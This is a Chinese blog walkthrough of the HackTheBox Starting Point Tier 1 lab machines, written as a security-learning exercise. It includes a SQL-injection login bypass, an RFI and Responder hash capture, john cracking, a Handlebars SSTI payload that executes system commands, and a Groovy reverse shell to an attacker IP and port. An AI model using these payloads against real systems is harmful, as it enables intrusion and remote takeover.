Jim_vegetable
Jim_vegetable

HACKTHEBOX——Starting Point Tier1

目录

Appointment

Sequel

Crocodile

Responder

Ignition

Bike

Pennyworth

Tactics

Appointment

HACKTHEBOX——Starting Point Tier1_第1张图片

task 1 What does the acronym SQL stand for?

结构化查询语言(Structured Query Language)简称SQL,是一种特殊目的的编程语言,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统。

结构化查询语言是高级的非过程化编程语言,允许用户在高层数据结构上工作。它不要求用户指定对数据的存放方法,也不需要用户了解具体的数据存放方式,所以具有完全不同底层结构的不同数据库系统, 可以使用相同的结构化查询语言作为数据输入与管理的接口。结构化查询语言语句可以嵌套,这使它具有极大的灵活性和强大的功能。

task 2 What is one of the most common type of SQL vulnerabilities?

SQL注入sql injection即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。

task 3 What does PII stand for?

个人验证信息(PII,personally identifiable information)是有关一个人的任何数据,这些数据能帮助识别这个人,如姓名、指纹或其他生物特征资料、电子邮件地址、电话号码或社会安全号码。

task 4 What does the OWASP Top 10 list name the classification for this vulnerability?

结合上下文,应该是sql注入被OWASP Top 10分类成什么

HACKTHEBOX——Starting Point Tier1_第2张图片

task 5 What service and version are running on port 80 of the target?

HACKTHEBOX——Starting Point Tier1_第3张图片

task 6 What is the standard port used for the HTTPS protocol?

443端口即网页浏览端口,主要是用于HTTPS服务,是提供加密和通过安全端口传输的另一种HTTP。在一些对安全性要求较高的网站,比如银行、证券、购物等,都采用HTTPS服务,这样在这些网站上的交换信息,其他人抓包获取到的是加密数据,保证了交易的安全性。

task 7 What is one luck-based method of exploiting login pages?

利用运气登陆页面的方法?暴力破解?

brute-forcing

task 8 What is a folder called in web-application terminology?

web应用术语中文件夹叫什么?

Web目录web directory是网站的在线列表或目录。

task 9 What response code is given for "Not Found" errors?

HACKTHEBOX——Starting Point Tier1_第4张图片

task 10 What switch do we use with Gobuster to specify we're looking to discover directories, and not subdomains?

gobuster发现网站目录用参数dir

task 11 What symbol do we use to comment out parts of the code?

#可以注释sql语句

Submit root flag

有80端口,尝试访问web页面,打开发现是一个登录表单

HACKTHEBOX——Starting Point Tier1_第5张图片

尝试弱口令无果后,尝试登录处是否存在sql注入

HACKTHEBOX——Starting Point Tier1_第6张图片

用户名处输入admin' or '1' = '1,密码随意,即可成功登录拿到flag

select * from users where username = 'admin' or '1' = '1' and password ='123'

over

HACKTHEBOX——Starting Point Tier1_第7张图片

Sequel

task 1 What does the acronym SQL stand for?

和上一关一样的问题

task 2 During our scan, which port running mysql do we find?

task 3 What community-developed MySQL version is the target running?

nmap

-sC:使⽤默认脚本集执行脚本扫描。它相当于 --script=default。此类别中的某些脚本被认为是侵⼊性的,未经许可不得针对⽬标⽹络运行。

-sV:启⽤版本检测,它将检测哪些版本在什么平台上运行

HACKTHEBOX——Starting Point Tier1_第8张图片

task 4 What switch do we need to use in order to specify a login username for the MySQL service?

用什么开关来指定mysql的登录用户名?

task 5 Which username allows us to log into MariaDB without providing a password?

经过尝试发现root可以免密登录

mysql -u root -h 10.129.117.126

HACKTHEBOX——Starting Point Tier1_第9张图片task 6 What symbol can we use to specify within the query that we want to display everything inside a table?

*

task 7 What symbol do we need to end each query with?

;

Submit root flag

查数据库

HACKTHEBOX——Starting Point Tier1_第10张图片

使用htb数据库,查表

HACKTHEBOX——Starting Point Tier1_第11张图片

查看config表

HACKTHEBOX——Starting Point Tier1_第12张图片

over

HACKTHEBOX——Starting Point Tier1_第13张图片

Crocodile

task 1 What nmap scanning switch employs the use of default scripts during a scan?

上一关用过了-sC

sC:使⽤默认脚本集执行脚本扫描。相当于脚本=默认。此类别中的⼀些脚本被认为是侵⼊性的,并且未经许可,不得针对⽬标⽹络运行。

task 2 What service version is found to be running on port 21?

HACKTHEBOX——Starting Point Tier1_第14张图片

task 3 What FTP code is returned to us for the "Anonymous FTP login allowed" message?

允许匿名登陆返回的代码

HACKTHEBOX——Starting Point Tier1_第15张图片

task 4 What command can we use to download the files we find on the FTP server?

get,之前使用过了

task 5 What is one of the higher-privilege sounding usernames in the list we retrieved?

我们检索到的列表中最高权限的用户名是什么

使用匿名用户登录ftp

HACKTHEBOX——Starting Point Tier1_第16张图片

把两个文件都下载到本地

HACKTHEBOX——Starting Point Tier1_第17张图片

查看文件,这些用户里肯定是admin权限最高

HACKTHEBOX——Starting Point Tier1_第18张图片

task 6 What version of Apache HTTP Server is running on the target host?

HACKTHEBOX——Starting Point Tier1_第19张图片

task 7 What is the name of a handy web site analysis plug-in we can install in our browser?

我们可以在浏览器中安装的方便的网站分析插件是什么

HACKTHEBOX——Starting Point Tier1_第20张图片

task 8 What switch can we use with gobuster to specify we are looking for specific filetypes?

gobuster哪一个开关可以指定我们正在寻找的特定文件类型?

HACKTHEBOX——Starting Point Tier1_第21张图片

task 9 What file have we found that can provide us a foothold on the target?

gobuster dir --url http://10.129.139.38 --wordlist /usr/share/wordlists/dirb/commom.txt -x php

根据提示猜测应该是*****.php,所以使用-x指定php文件进行扫描

HACKTHEBOX——Starting Point Tier1_第22张图片

SUBMIT FLAG

访问login.php

HACKTHEBOX——Starting Point Tier1_第23张图片

使用admin和对应的口令登录,登陆成功,获得flag

HACKTHEBOX——Starting Point Tier1_第24张图片

over

HACKTHEBOX——Starting Point Tier1_第25张图片

Responder

task 1 How many TCP ports are open on the machine?

--min-rate :这⽤于指定 Nmap 每次发送的最⼩数据包数,随着数字的增加,它会加快扫描速度

 nmap --min-rate 5000 -p 1-65535 -sV 10.129.132.120

HACKTHEBOX——Starting Point Tier1_第26张图片

这里也不清楚怎么回事,一开始扫出来3个端口,写入发现错误,再次扫描出现2个端口,填入就过关了,但是官方答案给的却是4个 ,不管了,接着往下把

task 2 When visiting the web service using the IP address, what is the domain that we are being redirected to?

访问web即可知道被重定向至哪个页面,页面报错,刚刚输入的IP被重置为一个域名

HACKTHEBOX——Starting Point Tier1_第27张图片

task 3 Which scripting language is being used on the server to generate webpages?

因为IP地址被重定向,需要在hosts文件中写入IP到域名的映射

HACKTHEBOX——Starting Point Tier1_第28张图片

再次访问即可跳转页面 ,借助wappalyzer可以快速知道目标网站使用php语言

task 4 What is the name of the URL parameter which is used to load different language versions of the webpage?

切换语言时,url更改为图中所示

所以用于加载不同语言的url参数是page

task 5 Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

问哪一个参数值是用来利用本地文件包含(LFI)的

选择../../../../../../../../windows/system32/drivers/etc/hosts

task 6 Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

问哪一个参数值是用来利用远程文件包含(RFI)的

选择//10.10.14.6/somefile

task 7 What does NTLM stand for?

New Technology LAN Manager

NTLM是NT LAN Manager的缩写,这也说明了协议的来源。NTLM 是指 telnet 的一种验证身份方式,即问询/应答身份验证协议,是 Windows NT 早期版本的标准安全协议,Windows 2000 支持 NTLM 是为了保持向后兼容。Windows 2000内置三种基本安全协议之一。

身份验证过程

1. 客⼾端将⽤⼾名和域名发送给服务器。

2. 服务器⽣成⼀个随机字符串,称为challenge。

3. 客⼾端使⽤⽤⼾密码的 NTLM 哈希加密challenge,并将其发送回客⼾端

4. 服务器检索⽤⼾密码(或等效密码)。

5. 服务器使⽤从安全帐⼾数据库中检索到的哈希值来加密challenge字符串。然后将该值与从客⼾端接收到的值进行⽐较。如果值匹配,则客⼾端通过⾝份验证。

task 8 Which flag do we use in the Responder utility to specify the network interface?

responder程序中使用哪个接口来指定网络接口

HACKTHEBOX——Starting Point Tier1_第29张图片

task 9 There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?.

Responder 可以进行多种不同类型的攻击,但对于这种情况,它会设置⼀个恶意 SMB 服务器。当⽬标机器尝试对该服务器执 行 NTLM ⾝份验证时,响应程序会向服务器发送回⼀个质询,以使⽤⽤⼾密码进行加密。当服务器响应时,Responder 将使⽤质询 和加密响应来⽣成 NetNTLMv2。虽然我们⽆法逆转 NetNTLMv2,但我们可以尝试许多不同的常⽤密码,看看是否有任何密码⽣成 相同的质询-响应,如果找到,我们就知道那是密码。这通常被称为散列破解,我们将使⽤⼀个名为 John The Ripper 的程序来完成。

task 10 What is the password for the administrator user?   

HACKTHEBOX——Starting Point Tier1_第30张图片

HACKTHEBOX——Starting Point Tier1_第31张图片

启动responder后,通过 Web 浏览器如下设置⻚⾯参数,告诉服务器包含来⾃ SMB 服务器的资源

http://unika.htb/index.php?page=//10.10.16.133/somefile

然后在responder中获取到一些数据

HACKTHEBOX——Starting Point Tier1_第32张图片

把获取到的hash值保存到一个文件中,使用join去破解

使用john破解hash.txt

john hash.txt -w=/usr/share/wordlists/rockyou.txt

HACKTHEBOX——Starting Point Tier1_第33张图片

task 11 We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

我们将使用 Windows 服务(即在盒子上运行)使用我们恢复的密码远程访问 Responder 机器。它侦听的 TCP 端口是什么?

就是之前扫描出来的5985端口

SUBMIT FLAG

evil-winrm -i 10.129.132.120 -u administrator -p badminton

HACKTHEBOX——Starting Point Tier1_第34张图片

然后拿到flag即可

HACKTHEBOX——Starting Point Tier1_第35张图片

Ignition

task 1 Which service version is found to be running on port 80?

HACKTHEBOX——Starting Point Tier1_第36张图片

task 2 What is the 3-digit HTTP status code returned when you visit http://{machine IP}/?

访问页面失败,发现输入的IP地址被重定向至一个域名

HACKTHEBOX——Starting Point Tier1_第37张图片

则输入IP返回的状态码为302

HACKTHEBOX——Starting Point Tier1_第38张图片

task 3 What is the virtual host name the webpage expects to be accessed by?

即重定向的页面

task 4 What is the full path to the file on a Linux computer that holds a local list of domain name to IP address pairs?

/etc/hosts

Hosts是一个没有扩展名的系统文件,可以用记事本等工具打开,其作用就是将一些常用的网址域名与其对应的IP地址建立一个关联“数据库”,当用户在浏览器中输入一个需要登录的网址时,系统会首先自动从Hosts文件中寻找对应的IP地址,一旦找到,系统会立即打开对应网页,如果没有找到,则系统会再将网址提交DNS域名解析服务器进行IP地址的解析。

task 5 What is the full URL to the Magento login page?

修改hosts文件,在其中添加IP到域名的映射

HACKTHEBOX——Starting Point Tier1_第39张图片

再次访问web服务

HACKTHEBOX——Starting Point Tier1_第40张图片

可以访问之后,尝试使用gobuster扫描目录

gobuster dir --url http://ignition.htb/ --wordlist /usr/share/wordlists/dirb/common.txt

HACKTHEBOX——Starting Point Tier1_第41张图片

扫出一个/admin,看看是什么,跳转到Magento的登陆页面

HACKTHEBOX——Starting Point Tier1_第42张图片

task 6 What password provides access as admin to Magento?

已经知道用户名是admin了,本应想到暴力破解,但通关文档提示不应该使用暴力破解,直接按照官方文档给出的答案登陆吧,反正网络也不好

admin:qwerty123

SUBMIT FLAG

成功登陆后,获取flag

HACKTHEBOX——Starting Point Tier1_第43张图片

over

HACKTHEBOX——Starting Point Tier1_第44张图片

Bike

HACKTHEBOX——Starting Point Tier1_第45张图片

task 1 What TCP ports does nmap identify as open? Answer with a list of ports seperated by commas with no spaces, from low to high.

 nmap -sV -sC -v 10.129.57.46

HACKTHEBOX——Starting Point Tier1_第46张图片

task 2 What software is running the service listening on the http/web port identified in the first question?

HACKTHEBOX——Starting Point Tier1_第47张图片

Node.js 是⼀个开源、跨平台的后端 JavaScript 运行时环境,可⽤于构建可扩展的⽹络应⽤程序。

task 3 What is the name of the Web Framework according to Wappalyzer?

HACKTHEBOX——Starting Point Tier1_第48张图片

Express 是⼀个最⼩且灵活的 Node.js Web 应⽤程序框架,它为 Web 和移动应⽤程序提供了⼀组强⼤的功能。

task 4 What is the name of the vulnerability we test for by submitting {{7*7}}?

Node.js 和 Python Web 后端服务器经常使⽤名为“模板引擎”的软件。

模板引擎⽤于在⽹⻚上显⽰动态⽣成的内容。他们⽤实际值替换模板⽂件中的变量并将这些值显⽰给客⼾端,如果开发⼈员需要创建⼀个包含⽤⼾名、电⼦邮件、⽣⽇和各种其他内容的⽤⼾个⼈资料⻚⾯,那么对于使⽤静态 HTML ⻚⾯的多个不 同⽤⼾来说,即使不是不可能也很难实现。此处将使⽤模板引擎,以及包含个⼈资料⻚⾯基本结构的静态“模板”,然后⼿动填写⽤⼾信息并将 其显⽰给⽤⼾。

模板引擎容易出现的漏洞称为服务器端模板注⼊ (SSTI) Server Side Template Injection

服务器端模板注⼊是攻击者将恶意输⼊注⼊模板以在服务器上执行命令的漏洞。攻击者将本机(到模板引擎)代码注⼊⽹⻚的利⽤技术。然后代码通过模板引擎运行,攻击者在受影响的服务器上执行 代码。这种攻击在 Node.js ⽹站上⾮常常⻅,并且很有可能正在使⽤模板引擎来反映⽤⼾在联系⼈字段中输⼊的电⼦邮件 

在网站中输入{{7*7}}并提交,出现以下报错信息

HACKTHEBOX——Starting Point Tier1_第49张图片

 这意味着payload已经被模板引擎检测为有效,只是代码出现错误导致无法执行,可以看到报错信息中第三行,服务器正运行在/root/Backend,且当前使用的模板引擎为handlebars

task 5 What is the templating engine being used within Node.JS?

当前使用的模板引擎为handlebars

task 6 What is the name of the BurpSuite tab used to encode text?

decoder

task 7 In order to send special characters in our payload in an HTTP request, we'll encode the payload. What type of encoding do we use?

url

task 8 When we use a payload from HackTricks to try to run system commands, we get an error back. What is "not defined" in the response error?

require

task 9 What variable is the name of the top-level scope in Node.JS?

Global

{{#with "s" as |string|}}
	{{#with "e"}}
		{{#with split as |conslist|}}
			{{this.pop}}
			{{this.push (lookup string.sub "constructor")}}
			{{this.pop}}
			{{#with string.split as |codelist|}}
				{{this.pop}}
				{{this.push "return require('child_process').exec('whoami');"}}
				{{this.pop}}
				{{#each conslist}}
					{{#with (string.sub.apply 0 codelist)}}
						{{this}}
					{{/with}}
				{{/each}}
			{{/with}}
		{{/with}}
	{{/with}}
{{/with}}

{{this.push "return require('child_process').exec('whoami');"}} 指⽰服务器执行特定的系统命令

当向 Web 服务器发出请求时,发送的数据只能包含标准 128 字符 ASCII 集中的某些字符。必须对不属于该集合的保留字符进行url编码。

使用burpsuite的encoder对代码进行编码

HACKTHEBOX——Starting Point Tier1_第50张图片

再次输入刚才的payload,将包发送至repeater,将url编码填入参数email=中,点击send,提示出错

HACKTHEBOX——Starting Point Tier1_第51张图片

发现服务器报错,尝试修改payload中指示服务器操作的代码为 {{this.push "return process;"}} 按同样进行编码

HACKTHEBOX——Starting Point Tier1_第52张图片

 然后按同样的方式提交,可以看到响应结果正确

HACKTHEBOX——Starting Point Tier1_第53张图片

修改payload中指示服务器操作的代码为 {{this.push "return process.mainModule;"}}

看看是否可以访问 mainModule

HACKTHEBOX——Starting Point Tier1_第54张图片

同样没有报错,现在尝试调⽤require并加载模块child_process,因为它在可以默认的 Node.js 中使⽤,并且可⽤于执行系统命令,修改payload中指示服务器操作的代码为

{{this.push "return process.mainModule.require('child_process');"}}

HACKTHEBOX——Starting Point Tier1_第55张图片

现在成功调⽤require对象并加载了child_process模块,尝试运行系统命令,修改payload中指示服务器操作的代码为

{{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}

HACKTHEBOX——Starting Point Tier1_第56张图片

task 10 By exploiting this vulnerability, we get command execution as the user that the webserver is running as. What is the name of that user?

发现web服务器正在以root权限运行,接下来修改payload继续执行相应命令获取到flag

SUBMIT FLAG

ls /root

HACKTHEBOX——Starting Point Tier1_第57张图片

cat /root/flag.txt

HACKTHEBOX——Starting Point Tier1_第58张图片

over

HACKTHEBOX——Starting Point Tier1_第59张图片

Pennyworth

task 1 What does the acronym CVE stand for?

Common Vulnerabilities and Exposures 通用漏洞披露

task 2 What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

信息安全三要素CIA:即机密性,完整性,可用性

Confidentiality, Integrity, Availability

task 3 What is the version of the service running on port 8080?

HACKTHEBOX——Starting Point Tier1_第60张图片

task 4 What version of Jenkins is running on the target?

需要登录网站,因为目标网站http服务不在默认端口80上,需采用 IP:端口 形式

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成

访问到jenkins登陆页面 

HACKTHEBOX——Starting Point Tier1_第61张图片

尝试jenkins的默认密码,官方给出了几种用户名口令组合,逐个尝试,成功登录

HACKTHEBOX——Starting Point Tier1_第62张图片

管理页面右下角即Jenkins版本

task 5 What type of script is accepted as input on the Jenkins Script Console?

通过搜索Jenkins脚本控制台得知其实用语言为groovy

task 6 What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

cmd.exe

task 7 What is a different command than "ip a" we could use to display our network interfaces' information on Linux?

ifconfig

task 8 What switch should we use with netcat for it to use UDP transport mode?

HACKTHEBOX——Starting Point Tier1_第63张图片

task 9 What is the term used to describe making a target host initiate a connection back to the attacker host?

反弹shell  reverse shell

Submit root flag

groove反弹shell

查看连接VPN的IP地址

将IP地址与监听端口写入代码

String host="10.10.16.5";
int port=8000;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

在kali机中开启监听

将代码写入jenkins脚本控制台,点击右下角run执行代码

HACKTHEBOX——Starting Point Tier1_第64张图片成功getshell

HACKTHEBOX——Starting Point Tier1_第65张图片

查看flag

over

HACKTHEBOX——Starting Point Tier1_第66张图片

Tactics

task 1 Which Nmap switch can we use to enumerate machines when our packets are otherwise blocked by the Windows firewall?

task 2 What does the 3-letter acronym SMB stand for?

Server Message Block

task 3 What port does SMB use to operate at?

HACKTHEBOX——Starting Point Tier1_第67张图片

task 4 What command line argument do you give to `smbclient` to list available shares?

HACKTHEBOX——Starting Point Tier1_第68张图片

task 5 What character at the end of a share name indicates it's an administrative share?

HACKTHEBOX——Starting Point Tier1_第69张图片

$

task 6 Which Administrative share is accessible on the box that allows users to view the whole file system?

C$

task 7 What command can we use to download the files we find on the SMB Share?

get

task 8 Which tool that is part of the Impacket collection can be used to get an interactive shell on the system

按照walkthrough下载impacket

git clone https://github.com/CoreSecurity/impacket.git
cd impacket
python setup.py install

HACKTHEBOX——Starting Point Tier1_第70张图片

查看可用的python脚本

HACKTHEBOX——Starting Point Tier1_第71张图片

使用psexec.py连接靶机,获取交互式shell

 python psexec.py [email protected]

 但是最后还是连接失败了,还是用老办法的好

SUBMIT FLAG

使用smbclient连接

HACKTHEBOX——Starting Point Tier1_第72张图片

下载flag

 over

HACKTHEBOX——Starting Point Tier1_第73张图片

至此,tier1所有机器全部拿下,整个过程中还是学到了一些东西的,期待tier2,早早打完start point早早拿分

你可能感兴趣的:(getFlag,sql,数据库,database,web安全,安全)

  • 微服务下功能权限与数据权限的设计与实现 nbsaas-boot 微服务java架构
    在微服务架构下,系统的功能权限和数据权限控制显得尤为重要。随着系统规模的扩大和微服务数量的增加,如何保证不同用户和服务之间的访问权限准确、细粒度地控制,成为设计安全策略的关键。本文将讨论如何在微服务体系中设计和实现功能权限与数据权限控制。1.功能权限与数据权限的定义功能权限:指用户或系统角色对特定功能的访问权限。通常是某个用户角色能否执行某个操作,比如查看订单、创建订单、修改用户资料等。数据权限:
  • c++ 的iostream 和 c++的stdio的区别和联系 黄卷青灯77 c++算法开发语言iostreamstdio
    在C++中,iostream和C语言的stdio.h都是用于处理输入输出的库,但它们在设计、用法和功能上有许多不同。以下是两者的区别和联系:区别1.编程风格iostream(C++风格):C++标准库中的输入输出流类库,支持面向对象的输入输出操作。典型用法是cin(输入)和cout(输出),使用>操作符来处理数据。更加类型安全,支持用户自定义类型的输入输出。#includeintmain(){in
  • Long类型前后端数据不一致 igotyback 前端
    响应给前端的数据浏览器控制台中response中看到的Long类型的数据是正常的到前端数据不一致前后端数据类型不匹配是一个常见问题,尤其是当后端使用Java的Long类型(64位)与前端JavaScript的Number类型(最大安全整数为2^53-1,即16位)进行数据交互时,很容易出现精度丢失的问题。这是因为JavaScript中的Number类型无法安全地表示超过16位的整数。为了解决这个问
  • mysql禁用远程登录 igotyback mysql
    去mysql库中的user表里,将host都改成localhost之后刷新权限FLUSHPRIVILEGES;
  • Google earth studio 简介 陟彼高冈yu 旅游
    GoogleEarthStudio是一个基于Web的动画工具,专为创作使用GoogleEarth数据的动画和视频而设计。它利用了GoogleEarth强大的三维地图和卫星影像数据库,使用户能够轻松地创建逼真的地球动画、航拍视频和动态地图可视化。网址为https://www.google.com/earth/studio/。GoogleEarthStudio是一个基于Web的动画工具,专为创作使用G
  • 关于提高复杂业务逻辑代码可读性的思考 编程经验分享 开发经验java数据库开发语言
    目录前言需求场景常规写法拆分方法领域对象总结前言实际工作中大部分时间都是在写业务逻辑,一般都是三层架构,表示层(Controller)接收客户端请求,并对入参做检验,业务逻辑层(Service)负责处理业务逻辑,一般开发都是在这一层中写具体的业务逻辑。数据访问层(Dao)是直接和数据库交互的,用于查数据给业务逻辑层,或者是将业务逻辑层处理后的数据写入数据库。简单的增删改查接口不用多说,基本上写好一
  • SQL Server_查询某一数据库中的所有表的内容 qq_42772833 SQLServer数据库sqlserver
    1.查看所有表的表名要列出CrabFarmDB数据库中的所有表(名),可以使用以下SQL语句:USECrabFarmDB;--切换到目标数据库GOSELECTTABLE_NAMEFROMINFORMATION_SCHEMA.TABLESWHERETABLE_TYPE='BASETABLE';对这段SQL脚本的解释:SELECTTABLE_NAME:这个语句的作用是从查询结果中选择TABLE_NAM
  • 特殊的拜年 飘雪的天堂
    文/雪儿大年初一,家家户户没有了轰响的鞭炮声,大街上没有了人流涌动的喧闹,几乎看不到人影,变得冷冷清清。天刚亮不大会儿,村里的大喇叭响了起来:由于当前正值疾病高发期,流感流行的高峰期。同时,新型冠状病毒感染的肺炎进入第二波流行的上升期。为了自己和他人的健康安全着想,请大家尽量不要串门拜年,不要在街里走动。可以通过手机微信,视频,电话,信息拜年……今年的春节真是特别。禁止燃放鞭炮,烟花爆竹,禁止出村
  • 深入理解 MultiQueryRetriever:提升向量数据库检索效果的强大工具 nseejrukjhad 数据库python
    深入理解MultiQueryRetriever:提升向量数据库检索效果的强大工具引言在人工智能和自然语言处理领域,高效准确的信息检索一直是一个关键挑战。传统的基于距离的向量数据库检索方法虽然广泛应用,但仍存在一些局限性。本文将介绍一种创新的解决方案:MultiQueryRetriever,它通过自动生成多个查询视角来增强检索效果,提高结果的相关性和多样性。MultiQueryRetriever的工
  • MYSQL面试系列-04 king01299 面试mysql面试
    MYSQL面试系列-0417.关于redolog和binlog的刷盘机制、redolog、undolog作用、GTID是做什么的?innodb_flush_log_at_trx_commit及sync_binlog参数意义双117.1innodb_flush_log_at_trx_commit该变量定义了InnoDB在每次事务提交时,如何处理未刷入(flush)的重做日志信息(redolog)。它
  • MongoDB Oplog 窗口 喝醉酒的小白 MongoDB运维
    在MongoDB中,oplog(操作日志)是一个特殊的日志系统,用于记录对数据库的所有写操作。oplog允许副本集成员(通常是从节点)应用主节点上已经执行的操作,从而保持数据的一致性。它是MongoDB副本集实现数据复制的基础。MongoDBOplog窗口oplog窗口是指在MongoDB副本集中,从节点可以用来同步数据的时间范围。这个窗口通常由以下因素决定:Oplog大小:oplog的大小是有限
  • 【华为OD技术面试真题 - 技术面】-测试八股文真题题库(1) 算法大师 华为od面试python算法前端
    华为OD面试真题精选专栏:华为OD面试真题精选目录:2024华为OD面试手撕代码真题目录以及八股文真题目录文章目录华为OD面试真题精选1.黑盒测试和白盒测试的区别2.假设我们公司现在开发一个类似于微信的软件1.0版本,现在要你测试这个功能:打开聊天窗口,输入文本,限制字数在200字以内。问你怎么提取测试点。功能测试性能测试安全性测试可用性测试跨平台兼容性测试网络环境测试3.接口测试的工具你了解哪些
  • python os 环境变量 CV矿工 python开发语言numpy
    环境变量:环境变量是程序和操作系统之间的通信方式。有些字符不宜明文写进代码里,比如数据库密码,个人账户密码,如果写进自己本机的环境变量里,程序用的时候通过os.environ.get()取出来就行了。os.environ是一个环境变量的字典。环境变量的相关操作importos"""设置/修改环境变量:os.environ[‘环境变量名称’]=‘环境变量值’#其中key和value均为string类
  • 【PG】常见数据库、表属性设置 江无羡 数据库
    PG的常见属性配置方法数据库复制、备份相关表的复制标识单表操作批量表操作链接数据库复制、备份相关表的复制标识单表操作通过ALTER语句单独更改一张表的复制标识。ALTERTABLE[tablename]REPLICAIDENTITYFULL;批量表操作通过代码块的方式,对某个schema中的所有表一起更新其复制标识。SELECTtablename,CASErelreplidentWHEN'd'TH
  • 直返的东西正品吗?直返APP安全吗?直返是正规平台吗? 氧惠购物达人
    亲们,你们是不是经常在直返APP上买东西呀?但是,你们有没有想过,里面的东西到底是不是正品呢?这个APP安全吗?它是不是一个正规的平台呀?别着急,今天我就来给大家揭秘一下!氧惠APP(带货领导者)——是与以往完全不同的抖客+淘客app!2023全新模式,我的直推也会放到你下面。主打:带货高补贴,深受各位带货团队长喜爱(每天出单带货几十万单)。注册即可享受高补贴+0撸+捡漏等带货新体验。送万元推广大
  • nosql数据库技术与应用知识点 皆过客,揽星河 NoSQLnosql数据库大数据数据分析数据结构非关系型数据库
    Nosql知识回顾大数据处理流程数据采集(flume、爬虫、传感器)数据存储(本门课程NoSQL所处的阶段)Hdfs、MongoDB、HBase等数据清洗(入仓)Hive等数据处理、分析(Spark、Flink等)数据可视化数据挖掘、机器学习应用(Python、SparkMLlib等)大数据时代存储的挑战(三高)高并发(同一时间很多人访问)高扩展(要求随时根据需求扩展存储)高效率(要求读写速度快)
  • EIO国际确定性的交易(3/10)资管 , 资金委托安全吗? 古城鹏哥
    大家可能都知道资金托管,账户是自己开,钱在自己的账户上,密码是由自己掌控,别人提不走你账户的资金,每天可以看下到自己的账户,也可以看到交易流水。现金只能提到自己的银行卡中。账户由技术人员或操作人员,或者是机构团队帮你操作账户,产生盈利和收入,以获得的利润来分配盈利,技术强硬和做的时间久了过硬技术团队,会保证你的资金本金,不会让你的本金亏损的按照一定比例分配收入。所以在这个过程当中一定要看清楚技术的
  • SpringBlade dict-biz/list 接口 SQL 注入漏洞 文章永久免费只为良心 oracle数据库
    SpringBladedict-biz/list接口SQL注入漏洞POC:构造请求包查看返回包你的网址/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1漏洞概述在SpringBlade框架中,如果dict-biz/list接口的后台处理逻辑没有正确地对用户输入进行过滤或参数化查询(PreparedSta
  • insert into select 主键自增_mybatis拦截器实现主键自动生成 weixin_39521651 insertintoselect主键自增mybatisdelete返回值mybatisinsert返回主键mybatisinsert返回对象mybatisplusinsert返回主键mybatisplus插入生成id
    前言前阵子和朋友聊天,他说他们项目有个需求,要实现主键自动生成,不想每次新增的时候,都手动设置主键。于是我就问他,那你们数据库表设置主键自动递增不就得了。他的回答是他们项目目前的id都是采用雪花算法来生成,因此为了项目稳定性,不会切换id的生成方式。朋友问我有没有什么实现思路,他们公司的orm框架是mybatis,我就建议他说,不然让你老大把mybatis切换成mybatis-plus。mybat
  • TDengine 签约前晨汽车,解锁智能出行的无限潜力 涛思数据(TDengine) tdengine汽车大数据
    在全球汽车产业转型升级的背景下,智能网联和新能源技术正迅速成为商用车行业的重要发展方向。随着市场对环保和智能化需求的日益增强,企业必须在技术创新和数据管理上不断突破,以满足客户对高效、安全和智能出行的期待。在这一背景下,前晨汽车凭借其在新能源智能商用车领域的前瞻性布局和技术实力,成为行业中的佼佼者。前晨汽车采用整车数据采集和全车数据打通策略,能够实时将数据推送至APP端客户。然而,这导致整体写入和
  • “这才好”麻辣香锅 能够增加人身体的免疫能力 小补文知
    我就来介绍一种香锅,那就是“这才好”麻辣香锅,它产出于著名的蜀地文化,具有悠久的历史土家风味,麻辣鲜香,健康安全。采用传统秘制麻辣香锅油辣子,还有贴心加料“孜然包”满足人们的不同口味需求,香锅底料辣椒,微辣且香,含有丰富微量元素和维生素,具有辣而不躁,味道纯正,醇厚温和。花椒采用历史悠久,被列为宫廷供品的“贡椒”的汉源花椒。我们还挑选了“川菜之魂”郫县豆瓣的鼻祖品牌豆瓣,保留最原始的郫县豆瓣味道,
  • 关于Mysql 中 Row size too large (> 8126) 错误的解决和理解 秋刀prince mysqlmysql数据库
    提示:啰嗦一嘴,数据库的任何操作和验证前,一定要记得先备份!!!不会有错;文章目录问题发现一、问题导致的可能原因1、页大小2、行格式2.1compact格式2.2Redundant格式2.3Dynamic格式2.4Compressed格式3、BLOB和TEXT列二、解决办法1、修改页大小(不推荐)2、修改行格式3、修改数据类型为BLOB和TEXT列4、其他优化方式(可以参考使用)4.1合理设置数据
  • Java面试题精选:消息队列(二) 芒果不是芒 Java面试题精选javakafka
    一、Kafka的特性1.消息持久化:消息存储在磁盘,所以消息不会丢失2.高吞吐量:可以轻松实现单机百万级别的并发3.扩展性:扩展性强,还是动态扩展4.多客户端支持:支持多种语言(Java、C、C++、GO、)5.KafkaStreams(一个天生的流处理):在双十一或者销售大屏就会用到这种流处理。使用KafkaStreams可以快速的把销售额统计出来6.安全机制:Kafka进行生产或者消费的时候会
  • Kafka是如何保证数据的安全性、可靠性和分区的 喜欢猪猪 kafka分布式
